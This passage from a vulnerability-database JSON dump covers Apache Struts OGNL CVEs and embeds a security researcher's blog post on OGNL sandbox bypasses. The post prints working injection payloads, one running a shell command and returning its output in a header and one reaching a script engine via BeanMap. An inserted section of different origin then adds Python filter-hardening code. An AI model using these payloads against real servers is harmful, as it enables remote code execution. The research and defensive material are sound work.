"impactScore": 5.9}, "published": "2020-11-27T00:00:00", "type": "saint", "title": "Apache Struts double OGNL evaluation", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-27T00:00:00", "id": "SAINT:1126B0AA9A8BD987E404F1746F1D8BFA", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/struts_double_ognl", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2023-06-06T15:06:34", "description": "A flaw was found in the Apache Struts frameworks. 
When forced, some of the tag's attributes perform a double evaluation if a developer applies forced OGNL evaluation by using the %{...} syntax. Using a forced OGNL evaluation on untrusted user input allows an attacker to perform remote code execution and security degradation. The highest threat from this vulnerability is to data confidentiality, integrity as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-08T19:34:44", "type": "redhatcve", "title": "CVE-2020-17530", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-04-06T06:49:16", "id": "RH:CVE-2020-17530", "href": "https://access.redhat.com/security/cve/cve-2020-17530", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T14:52:37", "description": "A flaw was found in Apache Struts frameworks. When forced, struts2 performs double evaluation of attributes' values assigned to certain tags attributes such as ID so it is possible to pass a value that will be evaluated again when a tag's attributes will be rendered. 
With a carefully crafted request, this can lead to Remote Code Execution (RCE). The largest threat from this vulnerability is to data confidentiality and integrity as well as system availability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-18T19:29:30", "type": "redhatcve", "title": "CVE-2019-0230", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-04-06T05:37:27", "id": "RH:CVE-2019-0230", "href": "https://access.redhat.com/security/cve/cve-2019-0230", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-06T15:02:59", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. 
Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T06:28:32", "type": "redhatcve", "title": "CVE-2021-31805", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-04-06T09:03:31", "id": "RH:CVE-2021-31805", "href": "https://access.redhat.com/security/cve/cve-2021-31805", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2023-04-18T06:54:22", "description": "struts2-core is vulnerable to remote code execution. Tag attributes can be used to perform a double evaluation when forced OGNL evaluation is applied, by using the `%{...}` syntax. 
This can lead to remote code execution when an attacker provides a malicious input to be evaluated.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-09T05:42:42", "type": "veracode", "title": "Remote Code Execution", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-03T18:20:48", "id": "VERACODE:28516", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-28516/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T11:29:42", "description": "struts2-core is vulnerable to remote code execution (RCE). 
The vulnerability exists through the possibility of a forced double OGNL expression through the `${itemValue}` expression in `simple/radiomap.ftl`.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-08-14T01:35:22", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2022-12-02T21:18:00", "id": "VERACODE:26331", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-26331/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T05:55:55", "description": "Apache Struts is vulnerable to remote code execution. 
The vulnerability exists due to an incomplete fix of CVE-2020-17530 which is double evaluation if OGNL is used, allowing an attacker to inject maliciously crafted script via the %{...} syntax within the Struts tag.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T04:46:59", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2022-07-25T21:02:41", "id": "VERACODE:35070", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-35070/summary", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "github": [{"lastseen": "2023-06-06T15:19:42", "description": "Forced OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", 
"baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-09T22:51:56", "type": "github", "title": "Remote code execution in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2023-02-01T05:05:23", "id": "GHSA-JC35-Q369-45PV", "href": "https://github.com/advisories/GHSA-jc35-q369-45pv", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T14:36:47", "description": "Apache Struts 2.0.0 to 2.5.20 forced double OGNL evaluation, when evaluated on raw user input in tag attributes, may lead to remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-12-02T14:50:51", "type": "github", "title": "Improperly Controlled Modification of Dynamically-Determined Object Attributes in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": 
{"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-27T05:08:30", "id": "GHSA-WP4H-PVGW-5727", "href": "https://github.com/advisories/GHSA-wp4h-pvgw-5727", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:15:19", "description": "The fix issued for CVE-2020-17530 was incomplete. So from Apache Struts 2.0.0 to 2.5.29, still some of the tag\u2019s attributes could perform a double evaluation if a developer applied forced OGNL evaluation by using the %{...} syntax. Using forced OGNL evaluation on untrusted user input can lead to a Remote Code Execution and security degradation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-13T00:00:30", "type": "github", "title": "Expression Language Injection in Apache Struts", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530", "CVE-2021-31805"], "modified": "2023-01-27T05:03:07", "id": "GHSA-V8J6-6C2R-R27C", "href": "https://github.com/advisories/GHSA-v8j6-6c2r-r27c", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-27T17:06:16", "description": "## Overview[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#overview>)\n\nObject Graph Notation Language (OGNL) is a popular, Java-based, expression language used in popular frameworks and applications, such as Apache Struts and Atlassian Confluence. In the past, OGNL injections led to some serious remote code execution (RCE) vulnerabilities, such as the [Equifax breach](<https://www.synopsys.com/blogs/software-security/equifax-apache-struts-vulnerability-cve-2017-5638/>), and over the years, protection mechanisms and mitigations against OGNL injections have been developed and improved to limit the impact of these vulnerabilities.\n\nIn this blog post, I will describe how I was able to bypass certain OGNL injection protection mechanisms, including the one used by Struts and the one used by Atlassian Confluence. 
The purpose of this blog post is to share different approaches used when analyzing this kind of protection so they can be used to harden similar systems.\n\nNo new OGNL injections are being reported as part of this research, and unless future OGNL injections are found on the affected frameworks/applications, or known double evaluations affect an existing Struts application, this research does not constitute any immediate risk for Apache Struts or Atlassian Confluence.\n\n## Hello OGNL, my old friend\n\nI have a past history of bugs found in the Struts framework, including [CVE-2016-3087](<https://cwiki.apache.org/confluence/display/WW/S2-033>), [CVE-2016-4436](<https://cwiki.apache.org/confluence/display/WW/S2-035>), [CVE-2017-5638](<https://cwiki.apache.org/confluence/display/WW/S2-046>), [CVE-2018-1327](<https://cwiki.apache.org/confluence/display/WW/S2-056>), [CVE-2020-17530](<https://cwiki.apache.org/confluence/display/WW/S2-061>) and even some [double OGNL injections](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>) through both Velocity and FreeMarker tags that remain unfixed to this date. Therefore, I have become familiar with the OGNL sandbox and its various escapes over the years, and I am still interested in any OGNL-related vulnerabilities that may appear. 
That was the case with Atlassian Confluence, [CVE-2021-26084](<https://jira.atlassian.com/browse/CONFSERVER-67940>) and [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>), where the former is an instance of the unresolved double evaluation via Velocity tags mentioned in my [2020 advisory](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nMy friend, Man Yue Mo, wrote a [great article](<https://securitylab.github.com/research/ognl-apache-struts-exploit-CVE-2018-11776/>) describing how the OGNL mitigations have been evolving over the years, and there are a few other posts that also describe in detail how these mitigations have been improving.\n\nIn 2020, disabling the sandbox became harder, so I decided to change the approach completely. I introduced new ways to get RCE by circumventing the sandbox and using the application server\u2019s Instance Manager to instantiate arbitrary objects that I could use to achieve RCE. This research was presented at our Black Hat 2020 talk, [Scribbling outside of template security](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>). We reported this issue to the Apache Struts team, and they [fixed](<https://github.com/apache/struts/commit/8d3393f09a06ff4a2b6827b6544524d1d6af3c7c>) the issue by using a block list. However, in 2021, Chris McCown published a [new bypass technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>) which leverages OGNL\u2019s AST map nodes and the Apache Commons Collections `BeanMap` class.\n\nThat was it: at that point I had enough of OGNL and stopped looking into it until two events happened in the same week:\n\n * My friend, [Mert](<https://twitter.com/mertistaken>), found what he thought was an SSTI in a bug bounty program. 
It turned out to be an OGNL injection, so he asked me to help him with the exploitation of the issue.\n * I read several tweets claiming that [CVE-2022-26134](<https://jira.atlassian.com/browse/CONFSERVER-79016>) could not be turned into RCE on the latest Confluence version (7.18.0 at that time).\n\nOkay, OGNL, my old friend. Here we go again.\n\n## Looking at Confluence `isSafeExpression` protection\n\nWhen CVE-2022-26134 was released, there was an initial understanding that the [OGNL injection could not lead to direct RCE in the latest version 7.18.0](<https://twitter.com/httpvoid0x2f/status/1532924239216627712>), since the `isSafeExpression` method could not be bypassed in that version.\n\nHarsh Jaiswal ([@rootxharsh](<https://twitter.com/rootxharsh>)) and Rahul Maini ([@iamnoooob](<https://twitter.com/iamnoooob>)) took a different approach and looked for a gadget chain in the allowed classes list that could allow them to create an admin account.\n\nSoon after, [@MCKSysAr](<https://twitter.com/MCKSysAr>) found a [nice and simple bypass](<https://twitter.com/MCKSysAr/status/1533053536430350337>):\n\n 1. Use the `Class` property instead of the `class` one.\n 2. Use string concatenation to bypass string checks.\n\nMCKSysAr\u2019s bypass was soon addressed by blocking access to the `Class` and `ClassLoader` properties. I had some other ideas, so I decided to take a look at the `isSafeExpression` implementation.\n\nThe first interesting thing I learned was that this method was actually parsing the OGNL expression into its AST form in order to analyze what it does and decide whether it should be allowed to be executed or not. 
Bye-bye to regexp-based bypasses.\n\nThen the main logic to inspect the parsed tree was the following:\n\n * Starting at the root node of the AST tree, recursively call `containsUnsafeExpression()` on each node of the tree.\n * If the node is an instance of `ASTStaticField`, `ASTCtor` or `ASTAssign` then the expression is deemed to be unsafe. This will prevent payloads using the following vectors: \n   * Static field accesses\n   * Constructor calls\n   * Variable assignments\n * If the node is an `ASTStaticMethod`, check that the class the method belongs to is in an allow list containing: \n   * `net.sf.hibernate.proxy.HibernateProxy`\n   * `java.lang.reflect.Proxy`\n   * `net.java.ao.EntityProxyAccessor`\n   * `net.java.ao.RawEntity`\n   * `net.sf.cglib.proxy.Factory`\n   * `java.io.ObjectInputValidation`\n   * `net.java.ao.Entity`\n   * `com.atlassian.confluence.util.GeneralUtil`\n   * `java.io.Serializable`\n * If the node is an `ASTProperty`, check it against a block list containing (after the initial fix): \n   * `class`\n   * `Class`\n   * `classLoader`\n   * `ClassLoader`\n * If the property looks like a class name, check if the class's namespace is defined in the `unsafePackageNames` block list (too long to list here).\n * If the node is an `ASTMethod`, check if we are calling `getClass` or `getClassLoader`.\n * If the node is an `ASTVarRef`, check if the variable name is in the `UNSAFE_VARIABLE_NAMES` block list: \n   * `#application`\n   * `#parameters`\n   * `#request`\n   * `#session`\n   * `#_memberAccess`\n   * `#context`\n   * `#attr`\n * If the node is an `ASTConst` (e.g. a string literal), call `isSafeExpressionInternal`, which will check the string against a block list (for example, harmful class names) and, in addition, will parse the string literal as an OGNL expression and apply the `containsUnsafeExpression()` recursive checks on it.\n * If a node has children, repeat the process for the children.\n\nThis is a pretty comprehensive control since it parses the AST recursively and makes sure that any AST nodes considered 
harmful are either rejected or inspected further.\n\nMCKSysAr\u2019s bypass was based on two things: A) `Class` and `ClassLoader` properties were not accounted for when inspecting `ASTProperty` nodes; and B) `\"java.lang.\" + \"Runtime\"` was parsed as an `ASTAdd` node with two `ASTConst` children. Neither of them matched any of the known harmful strings, and when parsed as OGNL expressions, neither was a valid expression, so they were not parsed further. A) was fixed quickly by disallowing access to the `Class` and `ClassLoader` properties, but B) was not fixed since the string check was considered a defense-in-depth control (it's impossible to analyze all variants in which a malicious string could be written).\n\nWith that in mind I took a look at the [list of OGNL AST nodes](<https://github.com/orphan-oss/ognl/tree/master/src/main/java/ognl>) to see if there was anything interesting that was not accounted for in the `isSafeExpression()` method.\n\n### Enter `ASTEval`\n\nThe first one that got my attention was `ASTEval`. It looked very interesting and it was not accounted for by the `containsUnsafeExpression()` method.\n\n`ASTEval` nodes have the form `(expr)(root)`: they parse the `expr` string into a new AST and evaluate it with `root` as the root object. This allows us to provide an OGNL expression as a string (an `ASTConst`) and have it evaluated! We know that `ASTConst` nodes are parsed as OGNL expressions and verified to not be harmful. However, we already saw that if we split the string literal into multiple parts, only the individual parts will be checked and not the result of the concatenation. 
For example, when the variable name is spelled as `'#'+'application'`, `#application` will never get checked, only `#` and `application`, which are deemed to be safe. In the resulting tree there is no trace of any `ASTVarRef` node, and therefore access to `#application` is granted.\n\n### Weaponizing `ASTEval`\n\nThere are multiple ways to craft a payload leveraging this vector. For example, we could get arbitrary RCE with the command output echoed back in a response header:\n \n \n ('(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@get'+'Runtime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))')('')\n \n \n\n### Enter `ASTMap`, `ASTChain` and `ASTSequence`\n\nI was already familiar with `ASTMap`s from reading [Mc0wn's great article](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). In a nutshell, OGNL allows developers to instantiate any `java.util.Map` implementation by using the `@<class_name>@{}` syntax.\n\nUsing this technique, we were able to use a `BeanMap` (a map wrapping a Java bean and exposing its getters and setters as map entries) to bypass the `getClass` limitation by rewriting the payload as:\n \n \n \n BeanMap map = @org.apache.commons.beanutils.BeanMap@{};\n map.setBean(\"\");\n map.get(\"class\").forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"js\").eval(payload);\n \n \n\nThis payload avoids calling the `BeanMap` constructor explicitly and, therefore, gets rid of the `ASTCtor` limitation. In addition, it allows us to call `Object.getClass()` implicitly by accessing the `class` item. 
However, we still have another problem: we need to be able to assign the map to a variable (`map`) so we can call the `setBean()` method on it and later call the `get()` method on the same map. Since `ASTAssign` was blocked, assignments were not an option. Fortunately, looking through the list of AST nodes, two more nodes got my attention: `ASTChain` and `ASTSequence`.\n\n * `ASTChain` allows us to pass the result of one evaluation as the root object of the next evaluation. For example: `(one).(two)` will evaluate `one` and use its result as the root for the evaluation of `two`.\n * `ASTSequence` allows us to run several evaluations on the same root object in sequence. For example: `one, two` will evaluate `one` and then `two` using the same root object.\n\nThe idea was to bypass the `ASTAssign` constraint by combining `ASTChain` and `ASTSequence`.\n\nWe can set the map returned by the `ASTMap` expression as the root for a sequence of expressions, so all of them will have the map as their root object:\n \n \n \n (#@BeanMap@{}).(expression1, expression2)\n \n \n\nIn our case, `expression1` is the call to `setBean()` and `expression2` is the call to `get()`.\n\nTaking that into account and splitting literal strings into multiple parts to bypass the block list, we got the following payload:\n \n \n \n (#@org.apache.commons.beanutils.BeanMap@{}).(setBean(''),get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('7*7'))\n \n \n\nThe final AST tree bypassing all `isSafeExpression` checks is:\n\n[figure: AST of the payload above; no `ASTAssign`, `ASTCtor` or `ASTVarRef` node is present]\n\nThere was a final problem to solve. The OGNL injection sink was `translateVariable()`, which resolves OGNL expressions wrapped in `${expressions}` delimiters. Therefore, our payload was not allowed to contain any curly brackets. 
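The two tricks that have carried the payload this far, splitting a blocked word across literals joined with `+`, and, for delimiter restrictions like the one `translateVariable()` imposes, spelling a character as a Java unicode escape that the OGNL lexer decodes before parsing, are cheap to model on the defensive side. The Python below is an added example, not code from this post or from Atlassian: it puts a naive substring blocklist next to the same check run after a normalisation pass, over constructed sample expressions shaped like the payloads above. The blocklist and the samples are illustrative assumptions; a real control inspects the AST, as Confluence does, and would fold `ASTAdd` over `ASTConst` children and reject `ASTEval` there rather than pattern-match the text.

```python
import re

# Constructed sample expressions, modelled on the payload shapes discussed
# above (not captured traffic): a benign one, a direct reference to a blocked
# context variable, two split-literal variants and unicode-escaped braces.
SAMPLES = {
    "benign": "person.name.toUpperCase()",
    "direct_varref": "#application.get('x')",
    "split_varref": "('#'+'application')",
    "split_class": "get('cla'+'ss').forName('javax'+'.script.ScriptEngineManager')",
    "unicode_braces": "(#@org.apache.commons.beanutils.BeanMap@\\u007b\\u007d)"
                      ".(setBean(''),get('cla'+'ss'))",
}

# Substrings a naive string-level filter would refuse (assumed list): unsafe
# context variables, the class property/getter, and the ${...} delimiters
# that translateVariable() will not accept inside an expression.
BLOCKLIST = ("#application", "#context", "#_memberAccess",
             "class", "getClass", "{", "}")


def naive_is_safe(expr: str) -> bool:
    """Blocklist match over the raw text, i.e. the check the split-literal
    and unicode-escape payloads were written to slip past."""
    return not any(bad in expr for bad in BLOCKLIST)


# Java-style \uXXXX escapes; the OGNL lexer decodes these before tokenising.
_UNICODE_ESCAPE = re.compile(r"\\u([0-9a-fA-F]{4})")
# Two adjacent string literals joined by '+', e.g. 'cla'+'ss' or "a" + 'b'.
# Escaped quotes inside a literal are not handled; enough for these shapes.
_LITERAL_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")


def decode_unicode_escapes(expr: str) -> str:
    """Turn \\u007b into '{' so the checker sees what the lexer will see."""
    return _UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), expr)


def fold_literal_concats(expr: str) -> str:
    """Merge 'a'+'b'+'c' into 'abc', repeating until nothing changes, so a
    blocked word split across literals is reassembled before matching."""
    previous = None
    while previous != expr:
        previous = expr
        expr = _LITERAL_CONCAT.sub(
            lambda m: "'" + m.group(2) + m.group(4) + "'", expr)
    return expr


def normalize(expr: str) -> str:
    # Escapes first: an escape could hide a quote or a '+' that the
    # concatenation pass needs to see.
    return fold_literal_concats(decode_unicode_escapes(expr))


def hardened_is_safe(expr: str) -> bool:
    """Same blocklist, applied after normalisation."""
    return naive_is_safe(normalize(expr))


def compare(samples=SAMPLES) -> dict:
    """Map each sample name to (naive verdict, hardened verdict)."""
    return {name: (naive_is_safe(e), hardened_is_safe(e))
            for name, e in samples.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in compare().items():
        print(f"{name:15} naive_safe={naive!s:5} hardened_safe={hardened}")
```

Run it and the split-literal and unicode-escape samples flip from "safe" to "blocked" once normalised, while the benign expression passes both checks. Treat this as the normalisation step to put in front of an AST walk such as `containsUnsafeExpression()`, not as the check itself: string folding cannot see concatenations built from anything other than literals, which is exactly the class of variant the Confluence team judged impossible to enumerate.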
